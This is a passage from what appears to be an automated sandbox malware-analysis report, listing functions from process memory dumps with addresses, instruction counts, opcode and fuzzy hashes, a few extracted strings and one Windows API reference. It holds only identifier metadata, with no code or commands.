                                        • Instruction ID: e7d9a94ed9b046772e6a758c75c37ecd2a2700ea246ca7e05ff4540cb580256c
                                        • Opcode Fuzzy Hash: 003a191ee91563cb0edf6bb50bbf6c54e777edc735e92a7e5a7cd2ae39b8a606
                                        • Instruction Fuzzy Hash: 9EF0ED71A003049BD7649FB9D49C79ABBE5EB44311F20442DD55ED7285DB39A881CB90
                                        Function 04FE8978 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bdc63eb822f26f91df4bb146c89c586f079faf416480f96575e59835275e0a3
                                        • Instruction ID: 5cb7b8fae7d369b90e13fbd90ba12822061fe3de1b8dec438c5d91461532115a
                                        • Opcode Fuzzy Hash: 2bdc63eb822f26f91df4bb146c89c586f079faf416480f96575e59835275e0a3
                                        • Instruction Fuzzy Hash: F7E02035704610D7CB083775A40C2ED7A56EBC4726F10402ED60983346CF78580183D9
                                        Function 04FE9558 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f38403cfdab0060ab2bff2c55a29c074bb057262dc3038e58891009f3785373b
                                        • Instruction ID: f978a6f0ce186d908f63652f910ab0465f44d7989f40118a83f04da3370e8c78
                                        • Opcode Fuzzy Hash: f38403cfdab0060ab2bff2c55a29c074bb057262dc3038e58891009f3785373b
                                        • Instruction Fuzzy Hash: 55D09E52B012651B6A6472BF5D10ABBB5CECAC68E7B4501369A06E7245ED84EC0B43F1
                                        Function 04FEDD78 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 7945aedad52d35ab916905df65817a2d9cae7ccf38b46b4255aada803f72d224
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: C7E08636B00014978B08955AD4144EDF7AADBCC221F04807AD90AA7740DA32691686E1
                                        Function 04FE8800 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3ed372339ca5f587bf645e86fc4727ce6fd1b3ffa91206e03bc2aa387a28082
                                        • Instruction ID: c8c3a0f7035643d3b02abc1a703473a87a23743dfb20ac2d8cbbc7b048cd58e5
                                        • Opcode Fuzzy Hash: a3ed372339ca5f587bf645e86fc4727ce6fd1b3ffa91206e03bc2aa387a28082
                                        • Instruction Fuzzy Hash: 1CE09A30E1820ACF8B15BF65D446579BFB1EB15346F14C0AADE4897286EA307A42CB80
                                        Function 04FEF860 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d77aa776d0fe133f7134d051a3e9ad4ecac6752006c2a19b06fec634130d3368
                                        • Instruction ID: bc5aaa34a683a270a916f409ecc0f0d94751398113c598c72722889661ec226f
                                        • Opcode Fuzzy Hash: d77aa776d0fe133f7134d051a3e9ad4ecac6752006c2a19b06fec634130d3368
                                        • Instruction Fuzzy Hash: EDE01A70E0564A9FCB80DFADC8825A9FFF0EB49214B5085AEC949EB205E3325652DB91
                                        Function 04FEF870 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: 687dee16fc8dc6ddeecd53c3d874c765711665af91886c93d6622efcf3688f39
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: C2D06271D042099F8780EFADC94156DFBF4EB48200F5085AA891DE7301F7315612DBD1
                                        Function 04FE8748 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 361e7e04825d5ee59d06c75d38a30028afcbad2fd0a3c0c22ebf1b4fceabaf70
                                        • Instruction ID: 1c136e1e60b83db33817849a80da7a454910baf65ed9858c5ac919f565bc5090
                                        • Opcode Fuzzy Hash: 361e7e04825d5ee59d06c75d38a30028afcbad2fd0a3c0c22ebf1b4fceabaf70
                                        • Instruction Fuzzy Hash: 70D01731854109CBCB08BBA5E81A4BDBB74FB00303F51816DD91B52196EA312A8ACAC0
                                        Function 04FE8810 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 430fe8dc203d79bfb4de36d741eb175c2a521a014ed104de51eb3938c09c2265
                                        • Instruction ID: 3abc9519f1ac089e6fbb3f720d225f6da8a7972b95d54206c7e915ea5dd90e0c
                                        • Opcode Fuzzy Hash: 430fe8dc203d79bfb4de36d741eb175c2a521a014ed104de51eb3938c09c2265
                                        • Instruction Fuzzy Hash: 99D01730E4820ACB8B08EFA8E44686EBBB5EB44202F10816ADE0993345EA306941CBC1
                                        Function 04FE7EA0 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43ceefec4342efb83657a150450eb2fa4f223db3b24cd8bb7e610932fec85e9a
                                        • Instruction ID: b0bfe25cf32abe0eda4d1d66716993bdf3fa8ae9297aa537bb50c4a6000a49c1
                                        • Opcode Fuzzy Hash: 43ceefec4342efb83657a150450eb2fa4f223db3b24cd8bb7e610932fec85e9a
                                        • Instruction Fuzzy Hash: 32C048326863008FEF0EAA2488663167AA2AB82701F0289988003C6060CAB844008A24
                                        Function 04FE7938 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0fe43dd880459abc3e40153b42e59b9ce320c386c011bbfb71a6240984f263a7
                                        • Instruction ID: bea90eca68c2ce075a0a807a1c1082b5e0d927b149561082a9638912c292e5a1
                                        • Opcode Fuzzy Hash: 0fe43dd880459abc3e40153b42e59b9ce320c386c011bbfb71a6240984f263a7
                                        • Instruction Fuzzy Hash: F8C08C30004B08CFC6183F3894018083F69EB44321341049CE40B1A2A38A35A841CA10
                                        Function 04FE7940 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e3a6a500b9ba63ecd3f64c578d3088cff80dfc95796c7c1d652144f35a3eac9
                                        • Instruction ID: 745af3a7f2e5800ebfe4b5aae9007358e6c0c8095801a4c25377b894245cc203
                                        • Opcode Fuzzy Hash: 7e3a6a500b9ba63ecd3f64c578d3088cff80dfc95796c7c1d652144f35a3eac9
                                        • Instruction Fuzzy Hash: 52B09231049B088FC2586F79A404818772AAB4432538004ACE80E0A2928E36E885CA44

                                        Non-executed Functions

                                        Function 07981BE0 Relevance: 12.9, Strings: 10, Instructions: 408COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 84l$84l$]$Jl$Jl$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-2561396418
                                        • Opcode ID: 271256f42a25b526954af3ae0011b6580b14c2abbf71a4942d5a57c394a147fb
                                        • Instruction ID: 30c6da9d648b279dd364266a534c3b6680da07ff29f07740ccb89bf3317d21f2
                                        • Opcode Fuzzy Hash: 271256f42a25b526954af3ae0011b6580b14c2abbf71a4942d5a57c394a147fb
                                        • Instruction Fuzzy Hash: B6D149B1B0434ACFC765AB6984017A6BBF5EFC6215F2884AFC915CF256DB31C842C7A1
                                        Function 04FE4C62 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 3n^$3n^$3n^$3n^$3n^
                                        • API String ID: 0-3808966400
                                        • Opcode ID: c991fb1356a101fc3aeb271a71583417e4c6e4ab2f421a0da12cac8e9897aa91
                                        • Instruction ID: 10cce3bd736ef75f0517f9179747032366ea13e64c79ff0cf8058e2595556509
                                        • Opcode Fuzzy Hash: c991fb1356a101fc3aeb271a71583417e4c6e4ab2f421a0da12cac8e9897aa91
                                        • Instruction Fuzzy Hash: 9F31E71654E3C21FC30B9B3988A85957F76AEB359471E01DBC1C8CF0E3D919581BCB9A
                                        Function 04FE4D62 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 3n^$3n^$3n^$3n^
                                        • API String ID: 0-1318641411
                                        • Opcode ID: 02b659d24530412a93487d5e59ae619bbb6eca02d8d473d379306ba354951d8a
                                        • Instruction ID: 4eca8796911ba53ef497105923b9789b44a42e4649060e8be3e80d6426508750
                                        • Opcode Fuzzy Hash: 02b659d24530412a93487d5e59ae619bbb6eca02d8d473d379306ba354951d8a
                                        • Instruction Fuzzy Hash: 9E41A021A0D3C15FD3139B3CD8A4A917FB1AF97554B0A40DBD0C8CF2A3DA24AC1AC796
                                        Function 07982209 Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl$Jl$Jl$Jl
                                        • API String ID: 0-515501743
                                        • Opcode ID: 6f3d5b066872e209932e091cd83c75601e50ab5d671deae90c71cf3868cd162f
                                        • Instruction ID: 1e13231164298c19ce267910643e86aa2515ce39c5cf60c07390aee50abb5627
                                        • Opcode Fuzzy Hash: 6f3d5b066872e209932e091cd83c75601e50ab5d671deae90c71cf3868cd162f
                                        • Instruction Fuzzy Hash: 962125B1A0D3E15FC35B53640822B623F753F83214F2A85DBC1909F6A3C8688C46C3A7

                                        Executed Functions

                                        Function 0537B490 Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 631c9575b8cc3f3959ea99ef936201eabddfc7e691f2c476a13c1208710f76e9
                                        • Instruction ID: 32679d864ef05b817154c8a1b591b97b30d3aa6115f08494a5e70708367684ff
                                        • Opcode Fuzzy Hash: 631c9575b8cc3f3959ea99ef936201eabddfc7e691f2c476a13c1208710f76e9
                                        • Instruction Fuzzy Hash: A1915470F017289BDB29EFB884606AEBBF2EF84700B40891DD516AB340DF7859068BD5
                                        Function 0537B4A0 Relevance: .3, Instructions: 252COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b82e2ab0e79ad92e91193a92db3b35611b3b799395ccdead58312d31bc46b285
                                        • Instruction ID: 0219e949222b118bf7abf41580d9ab2b68bf191f01809b3e6ae497d934070155
                                        • Opcode Fuzzy Hash: b82e2ab0e79ad92e91193a92db3b35611b3b799395ccdead58312d31bc46b285
                                        • Instruction Fuzzy Hash: 01914371F007289BDB29EFB984106AEBBF2EF84700B40891DD516AB780DF7859068BD5
                                        Function 08F96840 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadToken.KERNELBASE(EFD808A4), ref: 08F968A2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2041680799.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: dcc39adfb3a5fb8737e8ccc881783281e9505408c65c9513dcc3c58061083675
                                        • Instruction ID: efbe127756e0961cc1e0bca25aca2d1d1bae6597aed058c976e5cec01fd032cf
                                        • Opcode Fuzzy Hash: dcc39adfb3a5fb8737e8ccc881783281e9505408c65c9513dcc3c58061083675
                                        • Instruction Fuzzy Hash: BC1125B5D003088FDB20DFAAC885B9EFBF4EF48324F24841AD458A7210D778A945CFA0
                                        Function 08F96839 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadToken.KERNELBASE(EFD808A4), ref: 08F968A2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2041680799.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 111e585c58820765073bf2872807abc14eb6bcb3ac138f4395e66f025b9e506a
                                        • Instruction ID: 3611f8ba5ba7c9215f96c4fbe713d2e654ca4781bde435fafa26bb17222f4094
                                        • Opcode Fuzzy Hash: 111e585c58820765073bf2872807abc14eb6bcb3ac138f4395e66f025b9e506a
                                        • Instruction Fuzzy Hash: 791116B5D002488FDB20DFA9C584B9EFBF5EF88314F24841AD458A7250D774A945CFA0
                                        Function 07CA2700 Relevance: .3, Instructions: 319COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0521c9567cfc8411224dfde2533c26fbb35708074e8158f38548d589d85f7977
                                        • Instruction ID: 6d2603baba7923ea91e0f6b5116c3ad6f7a1a3ef1d2b267e0cf7f2fff9c76819
                                        • Opcode Fuzzy Hash: 0521c9567cfc8411224dfde2533c26fbb35708074e8158f38548d589d85f7977
                                        • Instruction Fuzzy Hash: 29B16AB1B00326EFD7259B79C8417AABBF2BFC9216F14806AD505CB291DB30DE41C7A1
                                        Function 053729F0 Relevance: .2, Instructions: 209COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e4af11a418a32547f644ad93d8c71ba70a9b2ea68173866c438c3cc2e1ac93f
                                        • Instruction ID: 9869697277bb7a462cb2134a2657d253fabf74e7bd2edbb8981849373de11fe4
                                        • Opcode Fuzzy Hash: 4e4af11a418a32547f644ad93d8c71ba70a9b2ea68173866c438c3cc2e1ac93f
                                        • Instruction Fuzzy Hash: 59917F74A00609DFCB25CF59C494ABEFBB1FF49310B248559E815AB365C73AEC91CBA0
                                        Function 07CA3CE8 Relevance: .2, Instructions: 177COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9768be53cd89cfc6152f170dbe72c928698873f6f94fff945ea9c5921c83ecdc
                                        • Instruction ID: 9bbe4ae02a8eab07d92f32d9ba1a7c4d3988d71a4b834aa533500b14b434fd3c
                                        • Opcode Fuzzy Hash: 9768be53cd89cfc6152f170dbe72c928698873f6f94fff945ea9c5921c83ecdc
                                        • Instruction Fuzzy Hash: 7A5159F0B10243EFD7255B2988616ABBBB29F8521AF24C46AD905CF381DB31DE05C7A5
                                        Function 05377728 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e79ba761b841caa6d56d10ab6c9de579e635ed00ec9df73d521bb2ceed30e1d
                                        • Instruction ID: 5027bad2f5b7d54036644610b3f54fee184e469e26bee25fd1d9e9d7fa562d7b
                                        • Opcode Fuzzy Hash: 1e79ba761b841caa6d56d10ab6c9de579e635ed00ec9df73d521bb2ceed30e1d
                                        • Instruction Fuzzy Hash: 7751BF30B042089FD725DB68D844A7A77E7FFC9214B1589A9D50ACB751EB75EC02CBA0
                                        Function 0537BAD0 Relevance: .2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82a51405ca7c8c1d1a6122973a820a811753a982108584a72adfdec4ff6199fb
                                        • Instruction ID: 263d6a3c5c4560641c6f7f21c96bf3f5f2b1d13f7617a3a6b18f7a0c435c5efa
                                        • Opcode Fuzzy Hash: 82a51405ca7c8c1d1a6122973a820a811753a982108584a72adfdec4ff6199fb
                                        • Instruction Fuzzy Hash: 2A610771E002499FDB24DFA9D594B9DFBF6FF88310F14812AE809AB254EB749841CB60
                                        Function 0537BAC0 Relevance: .1, Instructions: 149COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a4d772f51e15d3a4c9d5ecf7c4a9ad85bf2da7661c97f62b523cf5fb7a6d48b
                                        • Instruction ID: 7616f1e630e54d8b2af2675a24a5e45fab3dd453a3393c4aaccea65bb1a8e32c
                                        • Opcode Fuzzy Hash: 0a4d772f51e15d3a4c9d5ecf7c4a9ad85bf2da7661c97f62b523cf5fb7a6d48b
                                        • Instruction Fuzzy Hash: 3D510771E002499FDB64DFA9D494B9DFBF6FF88310F148029E809AB364EB749845CB61
                                        Function 05376FA0 Relevance: .1, Instructions: 118COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ea3404195ac35574018333df675fde213d966281b8d1b5e8aafa17d61b55879
                                        • Instruction ID: aa9762234cd2170629b54e5ce3555d8e5acc911e8930787e2778922067ffc36b
                                        • Opcode Fuzzy Hash: 9ea3404195ac35574018333df675fde213d966281b8d1b5e8aafa17d61b55879
                                        • Instruction Fuzzy Hash: F7415074A082488FCB15CF64C954AADBFF1EF8A215F154099E442EB392DB75DC02DB61
                                        Function 05376FC8 Relevance: .1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e2272058396d4f69ae3c655db5c568036a6a5321f663b59535c9d350323304be
                                        • Instruction ID: b61f44b94e6047c05ce37fd29529b21ec93c3027ea86fd27c46ea2620627bbef
                                        • Opcode Fuzzy Hash: e2272058396d4f69ae3c655db5c568036a6a5321f663b59535c9d350323304be
                                        • Instruction Fuzzy Hash: 34414C34B142088FDB18DF64C458AAEBBF6EF8E311F144498E446AB391DB75DC02CB60
                                        Function 07CA3CE7 Relevance: .1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ab63a74de7c173fe7836f688e4e229319c37e28d6790aa2a58504c12f683fc3
                                        • Instruction ID: 93cd6499d117b04050b1d5075c367e31b2ca91c5695b9fc45553c9014b385d00
                                        • Opcode Fuzzy Hash: 6ab63a74de7c173fe7836f688e4e229319c37e28d6790aa2a58504c12f683fc3
                                        • Instruction Fuzzy Hash: D93148F0E10243EFCB249F25C5A16A6B7F2AF8121AF24C46AD9048F391D731DE44C7A5
                                        Function 05372B00 Relevance: .1, Instructions: 108COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 96ed7e078aaeb1ae2bf2a5ec0fe9707297d92c86aea94b12d0f772999f62afe2
                                        • Instruction ID: dab5f04c4e80c6a1f691539da0526cbf2d74450a9bca3eb316b8abcd50971e4b
                                        • Opcode Fuzzy Hash: 96ed7e078aaeb1ae2bf2a5ec0fe9707297d92c86aea94b12d0f772999f62afe2
                                        • Instruction Fuzzy Hash: 69410A74A006099FCB15CF59C598EAAF7B1FF48310B258159E916AB364C73AFC91CBA0
                                        Function 0537C398 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a3b774d60e61fa68634084951636fe8b2360ec4d7abbc603d233b62dc50b582
                                        • Instruction ID: b9f0446290cbf97ae6011f2ade0852b5e761af5caa1f9ed2389789804ca1fea6
                                        • Opcode Fuzzy Hash: 5a3b774d60e61fa68634084951636fe8b2360ec4d7abbc603d233b62dc50b582
                                        • Instruction Fuzzy Hash: C431D4357006149FD725EB78E854B9EB7A6EFC4211F008539E10ACB791DFB4AC06CBA1
                                        Function 07CA26F3 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9c127935fc5d71d364fa61c6f283b910f0f8e607ec8f02b211c8b2a084e5fd4
                                        • Instruction ID: 2c9f2a94fc9d2ab0b19bb349d96edfa4815a79062a8a137baf021920a76bffc7
                                        • Opcode Fuzzy Hash: e9c127935fc5d71d364fa61c6f283b910f0f8e607ec8f02b211c8b2a084e5fd4
                                        • Instruction Fuzzy Hash: 3931F4B6A00227EFDB21CF59C485BA577F1BF8532AF048166E818CB291D734DB80CB61
                                        Function 0537AE70 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d669f324831d02f6e9018c25cd5117576b4440fd92dced0b2db41a745b0a4213
                                        • Instruction ID: 7826210afbcab216564b50bf048b48f5149d25140ad1ab37f357447542aabd98
                                        • Opcode Fuzzy Hash: d669f324831d02f6e9018c25cd5117576b4440fd92dced0b2db41a745b0a4213
                                        • Instruction Fuzzy Hash: 13312D70E016098FDB25DF69D494BAEBBF2EF89301F148029E505EB750EB748C418B65
                                        Function 0537AE80 Relevance: .1, Instructions: 84COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1c398e129ec2017470d970fe2de19f30c5299b0a6320d89d9bedcd9812eaf696
                                        • Instruction ID: 571d129281b1f040383f178657196b786b6dfa57b2ab3f31ffd85adf27d01da7
                                        • Opcode Fuzzy Hash: 1c398e129ec2017470d970fe2de19f30c5299b0a6320d89d9bedcd9812eaf696
                                        • Instruction Fuzzy Hash: 6A316170F016099FDB25DF69D494BAEBBF6EF88300F108029E505E7750EB788C018B65
                                        Function 0537AD38 Relevance: .1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34a0e71fe7633480cc8694db3369be5c737db9dc0d3190940c462c5b32bd172c
                                        • Instruction ID: 6804d58e885ba1276afbfbc6f324dadaf508254b0cbb1e92ae736a1ebc443e7f
                                        • Opcode Fuzzy Hash: 34a0e71fe7633480cc8694db3369be5c737db9dc0d3190940c462c5b32bd172c
                                        • Instruction Fuzzy Hash: EC316FB4F012089FDB50DBB8D458AAE7BB2EF84300F11846DC515AF3A5CA799D02CF60
                                        Function 0537E209 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb45058f11201893cbd32af08e5b752e1adce2c4e1264eccd3d895c149cb59fd
                                        • Instruction ID: 37f95f151f1ad28aa0e5c72fb419b0eb9a75f41ad32e087ecc54b12508592a66
                                        • Opcode Fuzzy Hash: cb45058f11201893cbd32af08e5b752e1adce2c4e1264eccd3d895c149cb59fd
                                        • Instruction Fuzzy Hash: 58312D70B082048FCB28DF68E458A9EBBF6EF8C314F144569E406EB761DB749C81CB91
                                        Function 0537AFA8 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99f8c1c62c5c081ff742e913e0236114f3f6f97807f7ee7c851d902e42158cf1
                                        • Instruction ID: b446ed1d3465ab7f9a2e4229bb68a38784786be79a42f42973d8acd2c0e62309
                                        • Opcode Fuzzy Hash: 99f8c1c62c5c081ff742e913e0236114f3f6f97807f7ee7c851d902e42158cf1
                                        • Instruction Fuzzy Hash: 8C21E071E043088FCB24DFAAD804B9EBFF5EB89220F14842ED019E7350CB7998058BA5
                                        Function 0537E218 Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 370169c17e7c0a667ed97dc9aa3d939191fc03aa7e33f79bc46967f9f51b74b5
                                        • Instruction ID: 65f6ddd4787cd62ee3803aeffc181423badab273db2f5b3ea69fa9394cb9ce20
